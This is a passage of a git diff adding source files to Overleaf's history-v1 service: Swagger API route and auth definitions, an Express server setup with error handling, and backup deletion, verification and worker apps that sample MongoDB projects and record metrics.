['application/octet-stream'], + responses: { + 200: { + description: 'Success', + schema: { + type: 'file', + }, + }, + 404: { + description: 'Not Found', + schema: { + $ref: '#/definitions/Error', + }, + }, + }, + security: [{ jwt: [] }, { token: [] }], + }, + put: { + 'x-swagger-router-controller': 'projects', + operationId: 'createProjectBlob', + tags: ['Project'], + description: + 'Create blob to be used in a file addition operation when importing a' + + ' snapshot or changes', + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + { + name: 'hash', + in: 'path', + description: 'Hexadecimal SHA-1 hash', + required: true, + type: 'string', + pattern: Blob.HEX_HASH_RX_STRING, + }, + ], + responses: { + 201: { + description: 'Created', + }, + }, + }, + post: { + 'x-swagger-router-controller': 'projects', + operationId: 'copyProjectBlob', + tags: ['Project'], + description: + 'Copies a blob from a source project to a target project when duplicating a project', + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'target project id', + required: true, + type: 'string', + }, + { + name: 'hash', + in: 'path', + description: 'Hexadecimal SHA-1 hash', + required: true, + type: 'string', + pattern: Blob.HEX_HASH_RX_STRING, + }, + { + name: 'copyFrom', + in: 'query', + description: 'source project id', + required: true, + type: 'string', + }, + ], + responses: { + 201: { + description: 'Created', + }, + }, + }, + }, + '/projects/{project_id}/latest/content': { + get: { + 'x-swagger-router-controller': 'projects', + operationId: 'getLatestContent', + tags: ['Project'], + description: + 'Get full content of the latest version. Text file ' + + 'content is included, but binary files are just linked by hash.', + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + ], + responses: { + 200: { + description: 'Success', + schema: { + $ref: '#/definitions/Snapshot', + }, + }, + 404: { + description: 'Not Found', + schema: { + $ref: '#/definitions/Error', + }, + }, + }, + }, + }, + '/projects/{project_id}/latest/hashed_content': { + get: { + 'x-swagger-router-controller': 'projects', + operationId: 'getLatestHashedContent', + tags: ['Project'], + description: + 'Get a snapshot of a project at the latest version ' + + 'with the hashes for the contents each file', + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + ], + responses: { + 200: { + description: 'Success', + schema: { + $ref: '#/definitions/Snapshot', + }, + }, + 404: { + description: 'Not Found', + schema: { + $ref: '#/definitions/Error', + }, + }, + }, + security: [ + { + basic: [], + }, + ], + }, + }, + '/projects/{project_id}/latest/history': { + get: { + 'x-swagger-router-controller': 'projects', + operationId: 'getLatestHistory', + tags: ['Project'], + description: + 'Get the latest sequence of changes.' + + ' TODO probably want a configurable depth.', + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + ], + responses: { + 200: { + description: 'Success', + schema: { + $ref: '#/definitions/ChunkResponse', + }, + }, + 404: { + description: 'Not Found', + schema: { + $ref: '#/definitions/Error', + }, + }, + }, + }, + }, + '/projects/{project_id}/latest/history/raw': { + get: { + 'x-swagger-router-controller': 'projects', + operationId: 'getLatestHistoryRaw', + tags: ['Project'], + description: 'Get the metadata of latest sequence of changes.', + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + { + name: 'readOnly', + in: 'query', + description: 'use read only database connection', + required: false, + type: 'boolean', + }, + ], + responses: { + 200: { + description: 'Success', + schema: { + $ref: '#/definitions/ChunkResponseRaw', + }, + }, + 404: { + description: 'Not Found', + schema: { + $ref: '#/definitions/Error', + }, + }, + }, + }, + }, + '/projects/{project_id}/latest/persistedHistory': { + get: { + 'x-swagger-router-controller': 'projects', + operationId: 'getLatestPersistedHistory', + tags: ['Project'], + description: 'Get the latest sequence of changes.', + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + ], + responses: { + 200: { + description: 'Success', + schema: { + $ref: '#/definitions/ChunkResponse', + }, + }, + 404: { + description: 'Not Found', + schema: { + $ref: '#/definitions/Error', + }, + }, + }, + }, + }, + + '/projects/{project_id}/versions/{version}/history': { + get: { + 'x-swagger-router-controller': 'projects', + operationId: 'getHistory', + tags: ['Project'], + description: + 'Get the sequence of changes that includes the given version.', + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + { + name: 'version', + in: 'path', + description: 'numeric version', + required: true, + type: 'number', + }, + ], + responses: { + 200: { + description: 'Success', + schema: { + $ref: '#/definitions/ChunkResponse', + }, + }, + 404: { + description: 'Not Found', + schema: { + $ref: '#/definitions/Error', + }, + }, + }, + }, + }, + '/projects/{project_id}/versions/{version}/content': { + get: { + 'x-swagger-router-controller': 'projects', + operationId: 'getContentAtVersion', + tags: ['Project'], + description: 'Get full content at the given version', + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + { + name: 'version', + in: 'path', + description: 'numeric version', + required: true, + type: 'number', + }, + ], + responses: { + 200: { + description: 'Success', + schema: { + $ref: '#/definitions/Snapshot', + }, + }, + 404: { + description: 'Not Found', + schema: { + $ref: '#/definitions/Error', + }, + }, + }, + }, + }, + '/projects/{project_id}/timestamp/{timestamp}/history': { + get: { + 'x-swagger-router-controller': 'projects', + operationId: 'getHistoryBefore', + tags: ['Project'], + description: + 'Get the sequence of changes. ' + ' before the given timestamp', + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + { + name: 'timestamp', + in: 'path', + description: 'timestamp', + required: true, + type: 'string', + format: 'date-time', + }, + ], + responses: { + 200: { + description: 'Success', + schema: { + $ref: '#/definitions/ChunkResponse', + }, + }, + 404: { + description: 'Not Found', + schema: { + $ref: '#/definitions/Error', + }, + }, + }, + }, + }, + '/projects/{project_id}/version/{version}/zip': { + get: { + 'x-swagger-router-controller': 'projects', + operationId: 'getZip', + tags: ['Project'], + description: 'Download zip with project content', + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + { + name: 'version', + in: 'path', + description: 'numeric version', + required: true, + type: 'number', + }, + ], + produces: ['application/octet-stream'], + responses: { + 200: { + description: 'success', + }, + 404: { + description: 'not found', + }, + }, + security: [ + { + token: [], + }, + ], + }, + post: { + 'x-swagger-router-controller': 'projects', + operationId: 'createZip', + tags: ['Project'], + description: + 'Create a zip file with project content. Returns a link to be polled.', + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + { + name: 'version', + in: 'path', + description: 'numeric version', + required: true, + type: 'number', + }, + ], + responses: { + 200: { + description: 'success', + schema: { + $ref: '#/definitions/ZipInfo', + }, + }, + 404: { + description: 'not found', + }, + }, + security: [ + { + basic: [], + }, + ], + }, + }, +} diff --git a/services/history-v1/api/swagger/security_definitions.js b/services/history-v1/api/swagger/security_definitions.js new file mode 100644 index 0000000..5b80a97 --- /dev/null +++ b/services/history-v1/api/swagger/security_definitions.js @@ -0,0 +1,17 @@ +'use strict' + +module.exports = { + jwt: { + type: 'apiKey', + in: 'header', + name: 'authorization', + }, + basic: { + type: 'basic', + }, + token: { + type: 'apiKey', + in: 'query', + name: 'token', + }, +} diff --git a/services/history-v1/app.js b/services/history-v1/app.js new file mode 100644 index 0000000..261f100 --- /dev/null +++ b/services/history-v1/app.js @@ -0,0 +1,172 @@ +'use strict' + +/* eslint-disable no-console */ + +// Metrics must be initialized before importing anything else +require('@overleaf/metrics/initialize') + +const config = require('config') +const Events = require('node:events') +const BPromise = require('bluebird') +const express = require('express') +const helmet = require('helmet') +const HTTPStatus = require('http-status') +const logger = require('@overleaf/logger') +const Metrics = require('@overleaf/metrics') +const bodyParser = require('body-parser') +const swaggerTools = require('swagger-tools') +const swaggerDoc = require('./api/swagger') +const security = require('./api/app/security') +const healthChecks = require('./api/controllers/health_checks') +const { mongodb, loadGlobalBlobs } = require('./storage') +const path = require('node:path') + +Events.setMaxListeners(20) +const app = express() +module.exports = app + +logger.initialize('history-v1') +Metrics.open_sockets.monitor() +Metrics.injectMetricsRoute(app) +app.use(Metrics.http.monitor(logger)) +Metrics.leaked_sockets.monitor(logger) + +// We may have fairly large JSON bodies when receiving large Changes. Clients +// may have to handle 413 status codes and try creating files instead of sending +// text content in changes. +app.use(bodyParser.json({ limit: '6MB' })) +app.use( + bodyParser.urlencoded({ + extended: false, + }) +) + +security.setupSSL(app) +security.setupBasicHttpAuthForSwaggerDocs(app) + +const HTTP_REQUEST_TIMEOUT = parseInt(config.get('httpRequestTimeout'), 10) +app.use(function (req, res, next) { + res.setTimeout(HTTP_REQUEST_TIMEOUT) + next() +}) + +app.get('/', function (req, res) { + res.send('') +}) + +app.get('/status', healthChecks.status) +app.get('/health_check', healthChecks.healthCheck) + +function setupSwagger() { + return new BPromise(function (resolve) { + swaggerTools.initializeMiddleware(swaggerDoc, function (middleware) { + app.use(middleware.swaggerMetadata()) + app.use(middleware.swaggerSecurity(security.getSwaggerHandlers())) + app.use(middleware.swaggerValidator()) + app.use( + middleware.swaggerRouter({ + controllers: path.join(__dirname, 'api/controllers'), + useStubs: app.get('env') === 'development', + }) + ) + app.use(middleware.swaggerUi()) + resolve() + }) + }) +} + +function setupErrorHandling() { + app.use(function (req, res, next) { + const err = new Error('Not Found') + err.status = HTTPStatus.NOT_FOUND + return next(err) + }) + + // Handle Swagger errors. + app.use(function (err, req, res, next) { + const projectId = req.swagger?.params?.project_id?.value + if (res.headersSent) { + return next(err) + } + + if (err.code === 'SCHEMA_VALIDATION_FAILED') { + logger.error({ err, projectId }, err.message) + return res.status(HTTPStatus.UNPROCESSABLE_ENTITY).json(err.results) + } + if (err.code === 'INVALID_TYPE' || err.code === 'PATTERN') { + logger.error({ err, projectId }, err.message) + return res.status(HTTPStatus.UNPROCESSABLE_ENTITY).json({ + message: 'invalid type: ' + err.paramName, + }) + } + if (err.code === 'ENUM_MISMATCH') { + return res.status(HTTPStatus.UNPROCESSABLE_ENTITY).json({ + message: 'invalid enum value: ' + err.paramName, + }) + } + if (err.code === 'REQUIRED') { + return res.status(HTTPStatus.UNPROCESSABLE_ENTITY).json({ + message: err.message, + }) + } + next(err) + }) + + app.use(function (err, req, res, next) { + const projectId = req.swagger?.params?.project_id?.value + logger.error({ err, projectId }, err.message) + + if (res.headersSent) { + return next(err) + } + + // Handle errors that specify a statusCode. Some come from our code. Some + // bubble up from AWS SDK, but they sometimes have the statusCode set to + // 200, notably some InternalErrors and TimeoutErrors, so we have to guard + // against that. We also check `status`, but `statusCode` is preferred. + const statusCode = err.statusCode || err.status + if (statusCode && statusCode >= 400 && statusCode < 600) { + res.status(statusCode) + } else { + res.status(HTTPStatus.INTERNAL_SERVER_ERROR) + } + + const sendErrorToClient = app.get('env') === 'development' + res.json({ + message: err.message, + error: sendErrorToClient ? err : {}, + }) + }) +} + +app.setup = async function appSetup() { + await mongodb.client.connect() + logger.info('Connected to MongoDB') + await loadGlobalBlobs() + logger.info('Global blobs loaded') + app.use(helmet()) + await setupSwagger() + setupErrorHandling() +} + +async function startApp() { + await app.setup() + + const port = parseInt(process.env.PORT, 10) || 3100 + app.listen(port, err => { + if (err) { + console.error(err) + process.exit(1) + } + Metrics.event_loop.monitor(logger) + Metrics.memory.monitor(logger) + }) +} + +// Run this if we're called directly +if (!module.parent) { + startApp().catch(err => { + console.error(err) + process.exit(1) + }) +} diff --git a/services/history-v1/backup-deletion-app.mjs b/services/history-v1/backup-deletion-app.mjs new file mode 100644 index 0000000..81b2b5b --- /dev/null +++ b/services/history-v1/backup-deletion-app.mjs @@ -0,0 +1,81 @@ +// @ts-check +// Metrics must be initialized before importing anything else +import '@overleaf/metrics/initialize.js' +import http from 'node:http' +import { fileURLToPath } from 'node:url' +import { promisify } from 'node:util' +import express from 'express' +import logger from '@overleaf/logger' +import Metrics from '@overleaf/metrics' +import { hasValidBasicAuthCredentials } from './api/app/security.js' +import { + deleteProjectBackupCb, + healthCheck, + healthCheckCb, + NotReadyToDelete, +} from './storage/lib/backupDeletion.mjs' +import { mongodb } from './storage/index.js' + +const app = express() + +logger.initialize('history-v1-backup-deletion') +Metrics.open_sockets.monitor() +Metrics.injectMetricsRoute(app) +app.use(Metrics.http.monitor(logger)) +Metrics.leaked_sockets.monitor(logger) +Metrics.event_loop.monitor(logger) +Metrics.memory.monitor(logger) + +function basicAuth(req, res, next) { + if (hasValidBasicAuthCredentials(req)) return next() + res.setHeader('WWW-Authenticate', 'Basic realm="Application"') + res.sendStatus(401) +} + +app.delete('/project/:projectId/backup', basicAuth, (req, res, next) => { + deleteProjectBackupCb(req.params.projectId, err => { + if (err) { + return next(err) + } + res.sendStatus(204) + }) +}) + +app.get('/status', (req, res) => { + res.send('history-v1-backup-deletion is up') +}) + +app.get('/health_check', (req, res, next) => { + healthCheckCb(err => { + if (err) return next(err) + res.sendStatus(200) + }) +}) + +app.use((err, req, res, next) => { + req.logger.addFields({ err }) + if (err instanceof NotReadyToDelete) { + req.logger.setLevel('warn') + return res.status(422).send(err.message) + } + req.logger.setLevel('error') + next(err) +}) + +/** + * @param {number} port + * @return {Promise<http.Server>} + */ +export async function startApp(port) { + await mongodb.client.connect() + await healthCheck() + const server = http.createServer(app) + await promisify(server.listen.bind(server, port))() + return server +} + +// Run this if we're called directly +if (process.argv[1] === fileURLToPath(import.meta.url)) { + const PORT = parseInt(process.env.PORT || '3101', 10) + await startApp(PORT) +} diff --git a/services/history-v1/backup-verifier-app.mjs b/services/history-v1/backup-verifier-app.mjs new file mode 100644 index 0000000..856a15d --- /dev/null +++ b/services/history-v1/backup-verifier-app.mjs @@ -0,0 +1,117 @@ +// @ts-check +// Metrics must be initialized before importing anything else +import '@overleaf/metrics/initialize.js' +import http from 'node:http' +import { fileURLToPath } from 'node:url' +import { promisify } from 'node:util' +import { setTimeout } from 'node:timers/promises' +import express from 'express' +import logger from '@overleaf/logger' +import Metrics from '@overleaf/metrics' +import { healthCheck } from './backupVerifier/healthCheck.mjs' +import { + BackupCorruptedError, + verifyBlob, +} from './storage/lib/backupVerifier.mjs' +import { mongodb } from './storage/index.js' +import { expressify } from '@overleaf/promise-utils' +import { Blob } from 'overleaf-editor-core' +import { loadGlobalBlobs } from './storage/lib/blob_store/index.js' +import { EventEmitter } from 'node:events' +import { + loopRandomProjects, + setWriteMetrics, +} from './backupVerifier/ProjectVerifier.mjs' + +const app = express() + +logger.initialize('history-v1-backup-verifier') +Metrics.open_sockets.monitor() +Metrics.injectMetricsRoute(app) +app.use(Metrics.http.monitor(logger)) +Metrics.leaked_sockets.monitor(logger) +Metrics.event_loop.monitor(logger) +Metrics.memory.monitor(logger) + +app.get( + '/history/:historyId/blob/:hash/verify', + expressify(async (req, res) => { + const { historyId, hash } = req.params + try { + await verifyBlob(historyId, hash) + res.sendStatus(200) + } catch (err) { + logger.warn({ err, historyId, hash }, 'manual verify blob failed') + if (err instanceof Blob.NotFoundError) { + res.status(404).send(err.message) + } else if (err instanceof BackupCorruptedError) { + res.status(422).send(err.message) + } else { + throw err + } + } + }) +) + +app.get('/status', (req, res) => { + res.send('history-v1-backup-verifier is up') +}) + +app.get( + '/health_check', + expressify(async (req, res) => { + await healthCheck() + res.sendStatus(200) + }) +) + +app.use((err, req, res, next) => { + req.logger.addFields({ err }) + req.logger.setLevel('error') + next(err) +}) + +const shutdownEmitter = new EventEmitter() + +shutdownEmitter.once('shutdown', async code => { + logger.info({ code }, 'shutting down') + await mongodb.client.close() + await setTimeout(100) + process.exit(code) +}) + +process.on('SIGTERM', () => { + shutdownEmitter.emit('shutdown', 0) +}) + +process.on('SIGINT', () => { + shutdownEmitter.emit('shutdown', 0) +}) + +/** + * @param {number} port + * @param {boolean} enableVerificationLoop + * @return {Promise<http.Server>} + */ +export async function startApp(port, enableVerificationLoop = true) { + await mongodb.client.connect() + await loadGlobalBlobs() + await healthCheck() + const server = http.createServer(app) + await promisify(server.listen.bind(server, port))() + enableVerificationLoop && loopRandomProjects(shutdownEmitter) + return server +} + +setWriteMetrics(true) + +// Run this if we're called directly +if (process.argv[1] === fileURLToPath(import.meta.url)) { + const PORT = parseInt(process.env.PORT || '3102', 10) + try { + await startApp(PORT) + } catch (error) { + shutdownEmitter.emit('shutdown', 1) + logger.error({ error }, 'error starting app') + } +} diff --git a/services/history-v1/backup-worker-app.mjs b/services/history-v1/backup-worker-app.mjs new file mode 100644 index 0000000..b21e55a --- /dev/null +++ b/services/history-v1/backup-worker-app.mjs @@ -0,0 +1,70 @@ +// @ts-check +// Metrics must be initialized before importing anything else +import '@overleaf/metrics/initialize.js' +import http from 'node:http' +import { fileURLToPath } from 'node:url' +import { promisify } from 'node:util' +import express from 'express' +import logger from '@overleaf/logger' +import Metrics from '@overleaf/metrics' +import { expressify } from '@overleaf/promise-utils' +import { drainQueue, healthCheck } from './storage/scripts/backup_worker.mjs' +const app = express() + +logger.initialize('history-v1-backup-worker') +Metrics.open_sockets.monitor() +Metrics.injectMetricsRoute(app) +app.use(Metrics.http.monitor(logger)) +Metrics.leaked_sockets.monitor(logger) +Metrics.event_loop.monitor(logger) +Metrics.memory.monitor(logger) + +app.get('/status', (req, res) => { + res.send('history-v1-backup-worker is up') +}) + +app.get( + '/health_check', + expressify(async (req, res) => { + await healthCheck() + res.sendStatus(200) + }) +) + +app.use((err, req, res, next) => { + req.logger.addFields({ err }) + req.logger.setLevel('error') + next(err) +}) + +async function triggerGracefulShutdown(server, signal) { + logger.info({ signal }, 'graceful shutdown: started shutdown sequence') + await drainQueue() + server.close(function () { + logger.info({ signal }, 'graceful shutdown: closed server') + setTimeout(() => { + process.exit(0) + }, 1000) + }) +} + +/** + * @param {number} port + * @return {Promise<http.Server>} + */ +export async function startApp(port) { + await healthCheck() + const server = http.createServer(app) + await promisify(server.listen.bind(server, port))() + const signals = ['SIGINT', 'SIGTERM'] + signals.forEach(signal => { + process.on(signal, () => triggerGracefulShutdown(server, signal)) + }) + return server +} + +// Run this if we're called directly +if (process.argv[1] === fileURLToPath(import.meta.url)) { + const PORT = parseInt(process.env.PORT || '3103', 10) + await startApp(PORT) +} diff --git a/services/history-v1/backupVerifier/ProjectMetrics.mjs b/services/history-v1/backupVerifier/ProjectMetrics.mjs new file mode 100644 index 0000000..ff37085 --- /dev/null +++ b/services/history-v1/backupVerifier/ProjectMetrics.mjs @@ -0,0 +1,33 @@ +import Metrics from '@overleaf/metrics' +import { objectIdFromDate } from './utils.mjs' +import { db } from '../storage/lib/mongodb.js' + +const projectsCollection = db.collection('projects') + +/** + * + * @param {Date} beforeTime + * @return {Promise<void>} + */ +export async function measurePendingChangesBeforeTime(beforeTime) { + const pendingChangeCount = await projectsCollection.countDocuments({ + 'overleaf.backup.pendingChangeAt': { + $lt: beforeTime, + }, + }) + + Metrics.gauge('backup_verification_pending_changes', pendingChangeCount) +} + +/** + * + * @param {Date} graceTime + * @return {Promise<void>} + */ +export async function measureNeverBackedUpProjects(graceTime) { + const neverBackedUpCount = await projectsCollection.countDocuments({ + 'overleaf.backup.lastBackedUpVersion': null, + _id: { $lt: objectIdFromDate(graceTime) }, + }) + Metrics.gauge('backup_verification_never_backed_up', neverBackedUpCount) +} diff --git a/services/history-v1/backupVerifier/ProjectSampler.mjs b/services/history-v1/backupVerifier/ProjectSampler.mjs new file mode 100644 index 0000000..93d9a1a --- /dev/null +++ b/services/history-v1/backupVerifier/ProjectSampler.mjs @@ -0,0 +1,79 @@ +// @ts-check +import { objectIdFromDate } from './utils.mjs' +import { db } from '../storage/lib/mongodb.js' +import config from 'config' + +const projectsCollection = db.collection('projects') + +const HAS_PROJECTS_WITHOUT_HISTORY = + config.get('hasProjectsWithoutHistory') === 'true' + +/** + * @param {Date} start + * @param {Date} end + * @param {number} N + * @yields {string} + */ +export async function* getProjectsCreatedInDateRangeCursor(start, end, N) { + yield* getSampleProjectsCursor(N, [ + { + $match: { + _id: { + $gt: objectIdFromDate(start), + $lte: objectIdFromDate(end), + }, + }, + }, + ]) +} + +export async function* getProjectsUpdatedInDateRangeCursor(start, end, N) { + yield* getSampleProjectsCursor(N, [ + { + $match: { + 'overleaf.history.updatedAt': { + $gt: start, + $lte: end, + }, + }, + }, + ]) +} + +/** + * @typedef {import('mongodb').Document} Document + */ + +/** + * + * @generator + * @param {number} N + * @param {Array<Document>} preSampleAggregationStages + * @yields {string} + */ +export async function* getSampleProjectsCursor( + N, + preSampleAggregationStages = [] +) { + const cursor = projectsCollection.aggregate([ + ...preSampleAggregationStages, + { $sample: { size: N } }, + { $project: { 'overleaf.history.id': 1 } }, + ]) + + let validProjects = 0 + let hasInvalidProject = false + + for await (const project of cursor) { + if (HAS_PROJECTS_WITHOUT_HISTORY && !project.overleaf?.history?.id) { + hasInvalidProject = true + continue + } + validProjects++ + yield project.overleaf.history.id.toString() + } + + if (validProjects === 0 && hasInvalidProject) { + yield* getSampleProjectsCursor(N, preSampleAggregationStages) + } +} diff --git a/services/history-v1/backupVerifier/ProjectVerifier.mjs b/services/history-v1/backupVerifier/ProjectVerifier.mjs new file mode 100644 index 0000000..1e4086b --- /dev/null +++ b/services/history-v1/backupVerifier/ProjectVerifier.mjs @@ -0,0 +1,320 @@ +// @ts-check +import { verifyProjectWithErrorContext } from '../storage/lib/backupVerifier.mjs' +import { promiseMapSettledWithLimit } from '@overleaf/promise-utils' +import logger from '@overleaf/logger' +import metrics from '@overleaf/metrics' +import { + getSampleProjectsCursor, + getProjectsCreatedInDateRangeCursor, + getProjectsUpdatedInDateRangeCursor, +} from './ProjectSampler.mjs' +import OError from '@overleaf/o-error' +import { setTimeout } from 'node:timers/promises' + +const MS_PER_30_DAYS = 30 * 24 * 60 * 60 * 1000 + +const failureCounter = new metrics.prom.Counter({ + name: 'backup_project_verification_failed', + help: 'Number of projects that failed verification', + labelNames: ['name'], +}) + +const successCounter = new metrics.prom.Counter({ + name: 'backup_project_verification_succeeded', + help: 'Number of projects that succeeded verification', +}) + +let WRITE_METRICS = false + +/** + * @typedef {import('node:events').EventEmitter} EventEmitter + */ + +/** + * Allows writing metrics to be enabled or disabled. + * @param {Boolean} writeMetrics + */ +export function setWriteMetrics(writeMetrics) { + WRITE_METRICS = writeMetrics +} + +/** + * + * @param {Error|unknown} error + * @param {string} historyId + */ +function handleVerificationError(error, historyId) { + const name = error instanceof Error ? error.name : 'UnknownError' + logger.error({ historyId, error, name }, 'error verifying project backup') + + WRITE_METRICS && failureCounter.inc({ name }) + + return name +} + +/** + * + * @param {Date} startDate + * @param {Date} endDate + * @param {number} interval + * @returns {Array<VerificationJobSpecification>} + */ +function splitJobs(startDate, endDate, interval) { + /** @type {Array<VerificationJobSpecification>} */ + const jobs = [] + while (startDate < endDate) { + const nextStart = new Date( + Math.min(startDate.getTime() + interval, endDate.getTime()) + ) + jobs.push({ startDate, endDate: nextStart }) + startDate = nextStart + } + return jobs +} + +/** + * + * @param {AsyncGenerator<string>} historyIdCursor + * @param {EventEmitter} [eventEmitter] + * @param {number} [delay] - Allows a delay between each verification + * @return {Promise<{verified: number, total: number, errorTypes: *[], hasFailure: boolean}>} + */ +async function verifyProjectsFromCursor( + historyIdCursor, + eventEmitter, + delay = 0 +) { + const errorTypes = [] + let verified = 0 + let total = 0 + let receivedShutdownSignal = false + if (eventEmitter) { + eventEmitter.once('shutdown', () => { + receivedShutdownSignal = true + }) + } + for await (const historyId of historyIdCursor) { + if (receivedShutdownSignal) { + break + } + total++ + try { + await verifyProjectWithErrorContext(historyId) + logger.debug({ historyId }, 'verified project backup successfully') + WRITE_METRICS && successCounter.inc() + verified++ + } catch (error) { + const errorType = handleVerificationError(error, historyId) + errorTypes.push(errorType) + } + if (delay > 0) { + await setTimeout(delay) + } + } + return { + verified, + total, + errorTypes, + hasFailure: errorTypes.length > 0, + } +} + +/** + * + * @param {number} nProjectsToSample + * @param {EventEmitter} [signal] + * @param {number} [delay] + * @return {Promise<VerificationJobStatus>} + */ +export async function verifyRandomProjectSample( + nProjectsToSample, + signal, + delay = 0 +) { + const historyIds = await getSampleProjectsCursor(nProjectsToSample) + return await verifyProjectsFromCursor(historyIds, signal, delay) +} + +/** + * Samples projects with history IDs between the specified dates and verifies them. + * + * @param {Date} startDate + * @param {Date} endDate + * @param {number} projectsPerRange + * @param {EventEmitter} [signal] + * @return {Promise<VerificationJobStatus>} + */ +async function verifyRange(startDate, endDate, projectsPerRange, signal) { + logger.info({ startDate, endDate }, 'verifying range') + + const results = await verifyProjectsFromCursor( + getProjectsCreatedInDateRangeCursor(startDate, endDate, projectsPerRange), + signal + ) + + if (results.total === 0) { + logger.debug( + { start: startDate, end: endDate }, + 'No projects found in range' + ) + } + + const jobStatus = { + ...results, + startDate, + endDate, + } + + logger.debug( + { ...jobStatus, errorTypes: Array.from(new Set(jobStatus.errorTypes)) }, + 'Verified range' + ) + return jobStatus +} + +/** + * @typedef {Object} VerificationJobSpecification + * @property {Date} startDate + * @property {Date} endDate + */ + +/** + * @typedef {import('./types.d.ts').VerificationJobStatus} VerificationJobStatus + */ + +/** + * @typedef {Object} VerifyDateRangeOptions + * @property {Date} startDate + * @property {Date} endDate + * @property {number} [interval] + * @property {number} [projectsPerRange] + * @property {number} [concurrency] + * @property {EventEmitter} [signal] + */ + +/** + * + * @param {VerifyDateRangeOptions} options + * @return {Promise<VerificationJobStatus>} + */ +export async function verifyProjectsCreatedInDateRange({ + concurrency = 0, + projectsPerRange = 10, + startDate, + endDate, + interval = MS_PER_30_DAYS, + signal, +}) { + const jobs = splitJobs(startDate, endDate, interval) + if (jobs.length === 0) { + throw new OError('Time range could not be split into jobs', { + start: startDate, + end: endDate, + interval, + }) + } + const settlements = await promiseMapSettledWithLimit( + concurrency, + jobs, + ({ startDate, endDate }) => + verifyRange(startDate, endDate, projectsPerRange, signal) + ) + return settlements.reduce( + /** + * + * @param {VerificationJobStatus} acc + * @param settlement + * @return {VerificationJobStatus} + */ + (acc, settlement) => { + if (settlement.status !== 'rejected') { + if (settlement.value.hasFailure) { + acc.hasFailure = true + } + acc.total += settlement.value.total + acc.verified += settlement.value.verified + acc.errorTypes = acc.errorTypes.concat(settlement.value.errorTypes) + } else { + logger.error({ ...settlement.reason }, 'Error processing range') + } + return acc + }, + /** @type {VerificationJobStatus} */ + { + startDate, + endDate, + verified: 0, + total: 0, + hasFailure: false, + errorTypes: [], + } + ) +} + +/** + * Verifies that projects that have recently gone out of RPO have been updated. + * + * @param {Date} startDate + * @param {Date} endDate + * @param {number} nProjects + * @param {EventEmitter} [signal] + * @return {Promise<VerificationJobStatus>} + */ +export async function verifyProjectsUpdatedInDateRange( + startDate, + endDate, + nProjects, + signal +) { + logger.debug( + { startDate, endDate, nProjects }, + 'Sampling projects updated in date range' + ) + const results = await verifyProjectsFromCursor( + getProjectsUpdatedInDateRangeCursor(startDate, endDate, nProjects), + signal + ) + + if (results.total === 0) { + logger.debug( + { start: startDate, end: endDate }, + 'No projects updated recently' + ) + } + + const jobStatus = { + ...results, + startDate, + endDate, + } + + logger.debug( + { ...jobStatus, errorTypes: Array.from(new Set(jobStatus.errorTypes)) }, + 'Verified recently updated projects' + ) + return jobStatus +} + +/** + * + * @param {EventEmitter} signal + * @return {void} + */ +export function loopRandomProjects(signal) { + let shutdown = false + signal.on('shutdown', function () { + shutdown = true + }) + async function loop() { + do { + try { + const result = await verifyRandomProjectSample(100, signal, 2_000) + logger.debug({ result }, 'verified random project sample') + } catch (error) { + logger.error({ error }, 'error verifying random project sample') + } + // eslint-disable-next-line no-unmodified-loop-condition + } while (!shutdown) + } + loop() +} diff --git a/services/history-v1/backupVerifier/healthCheck.mjs b/services/history-v1/backupVerifier/healthCheck.mjs new file mode 100644 index 0000000..af99874 --- /dev/null +++ b/services/history-v1/backupVerifier/healthCheck.mjs @@ -0,0 +1,32 @@ +import config from 'config' +import { verifyProjectWithErrorContext } from '../storage/lib/backupVerifier.mjs' +import { + measureNeverBackedUpProjects, + measurePendingChangesBeforeTime, +} from './ProjectMetrics.mjs' +import { getEndDateForRPO, RPO } from './utils.mjs' + +/** @type {Array<string>} */ +const HEALTH_CHECK_PROJECTS = JSON.parse(config.get('healthCheckProjects')) + +export async function healthCheck() { + if (!Array.isArray(HEALTH_CHECK_PROJECTS)) { + throw new Error('expected healthCheckProjects to be an array') + } + if (HEALTH_CHECK_PROJECTS.length !== 2) { + throw new Error('expected 2 healthCheckProjects') + } + if (!HEALTH_CHECK_PROJECTS.some(id => id.length === 24)) { + throw new Error('expected mongo id in healthCheckProjects') + } + if (!HEALTH_CHECK_PROJECTS.some(id => id.length < 24)) { + throw new Error('expected postgres id in healthCheckProjects') + } + + for (const historyId of HEALTH_CHECK_PROJECTS) { + await verifyProjectWithErrorContext(historyId) + } + + await measurePendingChangesBeforeTime(getEndDateForRPO(2)) + await measureNeverBackedUpProjects(getEndDateForRPO(2)) +} diff --git a/services/history-v1/backupVerifier/types.d.ts b/services/history-v1/backupVerifier/types.d.ts new file mode 100644 index 0000000..7bfa4a8 --- /dev/null +++ b/services/history-v1/backupVerifier/types.d.ts @@ -0,0 +1,8 @@ +export type VerificationJobStatus = { + verified: number + total: number + startDate?: Date + endDate?: Date + hasFailure: boolean + errorTypes: Array<string> +} diff --git a/services/history-v1/backupVerifier/utils.mjs b/services/history-v1/backupVerifier/utils.mjs new file mode 100644 index 0000000..b2d7ed2 --- /dev/null +++ b/services/history-v1/backupVerifier/utils.mjs @@ -0,0 +1,35 @@ +import { ObjectId } from 'mongodb' +import config from 'config' + +export const RPO = parseInt(config.get('backupRPOInMS'), 10) + +/** + * @param {Date} time + * @return {ObjectId} + */ +export function objectIdFromDate(time) { + return ObjectId.createFromTime(time.getTime() / 1000) +} + +/** + * @param {number} [factor] - Multiply RPO by this factor, default is 1 + * @return {Date} + */ +export function getEndDateForRPO(factor = 1) { + return new Date(Date.now() - RPO * factor) +} + +/** + * Creates a startDate, endDate pair that checks a period of time before the RPO horizon + * + * @param {number} offset - How many 